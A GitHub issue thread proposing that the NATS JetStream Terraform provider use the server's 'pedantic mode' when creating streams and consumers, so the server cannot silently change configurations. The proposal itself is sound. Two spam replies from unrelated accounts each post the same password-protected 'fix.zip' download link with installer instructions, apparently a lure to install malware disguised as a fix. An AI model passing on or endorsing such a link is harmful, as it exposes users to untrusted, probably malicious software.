### ISSUE TITLE
Use pedantic mode to configure stream assets

### ISSUE THREAD

**Issue by ripienaar** [nats-io/terraform-provider-jetstream#122]
### What motivated this proposal?

nats server has a number of behaviours where it will adjust the supplied config based external information, for example a consumer request can be silently adjusted based on stream limits or a stream config based on account limits.

This is ad odds with the concept of desired state configuration where what goes it must come out for later comparisons to determine if remediate is needed.

Since https://github.com/nats-io/nats-server/pull/5245 and https://github.com/nats-io/nats-server/issues/4959 the server will support a mode called "pedantic mode"  where it will not make these changes but fail instead, this is more compatible with the needs here.

JSM supports this since https://github.com/nats-io/jsm.go/pull/565

### What is the proposed change?

We need to use pedantic mode, for this to work we need to create the jsm.Manager with pedantic enabled and then create streams and consumers.

Some defaulting is fine and in line with current behaviour it's the weird dynamic ones that was the problem.  See the server issue for further details.

Since in terraform we have specifically chosen defaults for all properties using the generated config to create the assets would align well.

This is likely to break some configs so we need to carefully test this and I think the work done here https://github.com/nats-io/terraform-provider-jetstream/pull/97 should now not be needed anymore as pedantic mode will catch that scenario

### Who benefits from this change?

users of terraform, this is why the provider was deprecated, once this is in and works we can undeprecate it but the new version will only support ants server 2.11 or newer

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
